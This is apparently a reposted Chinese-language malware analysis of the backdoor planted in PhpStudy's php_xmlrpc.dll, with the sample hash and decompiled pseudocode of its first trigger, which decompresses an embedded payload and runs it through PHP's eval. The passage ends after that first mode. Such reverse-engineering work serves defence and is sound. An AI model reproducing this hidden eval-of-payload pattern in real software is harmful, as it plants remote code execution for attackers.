文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

PhpStudy 后门分析

2023-06-04 23:34

关注

作者:Hcamael@知道创宇404实验室
时间:2019年9月26日

背景介绍

2019/09/20,一则杭州警方通报打击涉网违法犯罪专项行动战果的新闻出现在我的朋友圈,其中通报了警方发现PhpStudy软件被种入后门后进行的侦查和逮捕了犯罪嫌疑人的事情。用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。

后门分析

最近关于讲phpstudy的文章很多,不过我只得到一个信息,后门在php_xmlrpc.dll文件中,有关键词:"eval(%s(%s))"。得知这个信息后,就降低了前期的工作难度。可以直接对该dll文件进行逆向分析。

我拿到的是2018 phpstudy的样本: MD5 (php_xmlrpc.dll) = c339482fd2b233fb0a555b629c0ea5d5

对字符串进行搜索,很容易的搜到了函数:sub_100031F0

经过对该函数逆向分析,发现该后门可以分为三种形式:

1.触发固定payload:
v12 = strcmp(**v34, aCompressGzip);      if ( !v12 )      {        v13 = &rce_cmd;        v14 = (char *)&unk_1000D66C;        v42 = &rce_cmd;        v15 = &unk_1000D66C;        while ( 1 )        {          if ( *v15 == '\'' )          {            v13[v12] = '\\';            v42[v12 + 1] = *v14;            v12 += 2;            v15 += 2;          }          else          {            v13[v12++] = *v14;            ++v15;          }          v14 += 4;          if ( (signed int)v14 >= (signed int)&unk_1000E5C4 )            break;          v13 = v42;        }        spprintf(&v36, 0, aVSMS, byte_100127B8, Dest);        spprintf(&v42, 0, aSEvalSS, v36, aGzuncompress, v42);        v16 = *(_DWORD *)(*a3 + 4 * executor_globals_id - 4);        v17 = *(void **)(v16 + 296);        *(_DWORD *)(v16 + 296) = &v32;        v40 = v17;        v18 = setjmp3((int)&v32, 0);        v19 = v40;        if ( v18 )        {          v20 = a3;          *(_DWORD *)(*(_DWORD *)(*a3 + 4 * executor_globals_id - 4) + 296) = v40;        }        else        {          v20 = a3;          zend_eval_string(v42, 0, &rce_cmd, a3);        }        result = 0;        *(_DWORD *)(*(_DWORD *)(*v20 + 4 * executor_globals_id - 4) + 296) = v19;        return result;      }

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 资料下载
  • 历年真题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯